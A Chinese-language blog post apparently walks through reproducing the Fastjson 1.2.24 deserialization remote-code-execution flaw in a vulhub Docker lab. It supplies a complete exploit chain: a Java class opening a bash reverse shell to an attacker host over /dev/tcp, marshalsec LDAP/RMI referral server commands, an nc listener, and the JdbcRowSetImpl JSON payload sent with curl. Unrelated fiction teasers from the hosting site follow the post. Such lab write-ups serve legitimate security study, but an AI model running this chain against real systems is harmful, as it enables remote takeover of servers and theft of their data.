Fastjson反序列化命令执行漏洞复现

基础了解


Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

反序列化常用的两种利用方式,一种是基于rmi,一种是基于ldap。
RMI是一种行为,指的是Java远程方法调用。
JNDI是一个接口,在这个接口下会有多种目录系统服务的实现,通过名称等去找到相关的对象,并把它下载到客户端中来。
ldap指轻量级目录访问协议。
具体详情请参考:基于Java反序列化RCE - 搞懂RMI、JRMP、JNDI

fastjson反序列漏洞利用过程存在java版本限制:
基于rmi的利用方式:适用jdk版本:JDK 6u141, JDK 7u131, JDK 8u121之前。
在jdk8u122的时候,加入了反序列化白名单的机制,关闭了rmi远程加载代码。
基于ldap的利用方式:适用jdk版本:JDK 11.0.1、8u182、7u191、6u201之前。
在Java 8u191更新中,Oracle对LDAP向量设置了相同的限制,并发布了CVE-2018-3149,关闭了JNDI远程类加载。
可以看到ldap的利用范围是比rmi要大的,实战情况下推荐使用ldap方法进行利用。

这里给出雷震众测的一张图:

环境介绍:


主机A:attacker(119.x.x.x)
jdk版本:8u151

主机B:模拟Fastjson漏洞环境(kali)
fastjson版本:1.2.24

这里我直接使用vulhub的漏洞环境,Kali自带就有docker,用docker-compose搭建一个写好的fastjson 1.2.24的环境。

启动fastjson环境:

# 启动docker服务
service docker start

# 查看已安装的镜像,获取fastjson的id
docker ps -a

# 正式启动
docker start id

用curl命令发送json数据看看环境搭是否运行

curl http://127.0.0.1:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'

利用过程


环境搭好就需要准备开始复现了,首先是写一个java文件编译为class文件,用于之后执行命令,这里准备了两个文件一个确定漏洞存在的命令(test)和一个反弹shell的(Exploit),写好后编译为class文件

将以下代码保存为Exploit.java(可以根据操作系统类型更改自己想要执行的命令)

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        //Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"});
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/119.x.x.x/8000;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

使用javac命令编译Exploit.java文件,生成一个Exploit.class文件

javac Exploit.java

把生成的Exploit.class文件,放到公网vps的web目录下,可以通过互联网的http服务访问到
在该目录使用 python 开启一个web服务

python -m SimpleHttpServer 80

访问提示可以下载即可

2、使用marshalsec启动一个RMI服务器,或者ladp服务器。
项目地址:https://github.com/mbechler/marshalsec
下载后切换到marshalsec目录下使用maven进行打包。

mvn clean package -DskipTests

打包成功后把生成的marshalsec-0.0.3-SNAPSHOT-all.jar上传到119.x.x.x

通过marshalsec启动一个RMI/LDAP服务监听的端口是8080
通过使用RMI或者LDAP的服务,将reference result 重定向到web服务器(即文件Exploit.class的存放位置)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://119.x.x.x:80/#Exploit" 8080
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://119.x.x.x:80/#Exploit" 8080

实验环境的jdk版本为8u151,大于8u121小于8u191,理论上rmi无法使用,ldap可以使用。

3.主机A监听8000端口:

nc -lvp 8000

3.发送json数据类型的payload
在Kali上输入运行以下命令

curl http://127.0.0.1:8090/ -H "Content-Type: application/json" --data '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://119.x.x.x:8080/Exploit","autoCommit":true}}'

或者用浏览器发包:

{
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "ldap://119.x.x.x:8080/Exploit", 
        "autoCommit": true
    }
}

注意:这里是最初版本的RCE没有加入checkAutoType()函数校验,它的主要作用是检测@type指定的类是否在白名单、黑名单。后面的许多漏洞都是对checkAutotype以及本身某些逻辑缺陷导致的漏洞进行修复,以及黑名单的不断增加。
1.2.24版本之前autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

复现结果


ldap服务接受到了请求,在这里可以看到docker环境加载了我们vps服务器上的Exploit.class文件

成功返回数据包到vps的web服务上

Vps上的nc接收到反弹的shell

jdk版本限制绕过:

参考:Fastjson反序列化漏洞利用

后续计划:

收集不同版本的探测payload,rce payload,争取都复现一遍

参考如下


Fastjson1.2.24反序列化命令执行漏洞
fastjson1.2.47反序列化漏洞复现
Fastjson反序列化漏洞利用

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
禁止转载,如需转载请通过简信或评论联系作者。
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,793评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,567评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,342评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,825评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,814评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,680评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,033评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,687评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 42,175评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,668评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,775评论 1 332
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,419评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,020评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,978评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,206评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,092评论 2 351
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,510评论 2 343